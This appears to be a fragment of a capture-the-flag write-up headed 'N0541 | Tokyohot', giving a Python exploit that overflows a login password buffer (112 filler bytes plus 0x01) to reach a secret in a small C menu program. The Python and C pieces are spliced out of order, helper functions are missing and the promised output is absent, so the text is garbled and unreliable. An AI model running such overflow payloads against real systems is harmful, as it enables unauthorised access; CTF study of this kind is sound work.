N0541 | Tokyohot

def main():
    s = socket.create_connection((HOST, PORT))
    register(s)
    login_overwrite(s)
    get_flag(s)
    s.close()

int main() {
    setbuf(stdout, NULL);
    while (1) {
        menu();
        int choice = read_int();
        switch (choice) {
            case 1: register_user(); break;
            case 2: login(); break;
            case 3: show_secret(); break;
            case 4: exit(0);
        }
    }
}

def login_overwrite(s):
    menu(s)
    s.sendall(b'2\n')
    recvuntil(s, b'Password: ')
    # 112 filler + 0x01 + newline
    payload = b'A' * 112 + b'\x01' + b'\n'
    s.sendall(payload)

There is a hidden detail: the program copies the password from the stack buffer into the heap password field using strcpy.

if __name__ == "__main__":
    main()

Running the script locally prints:
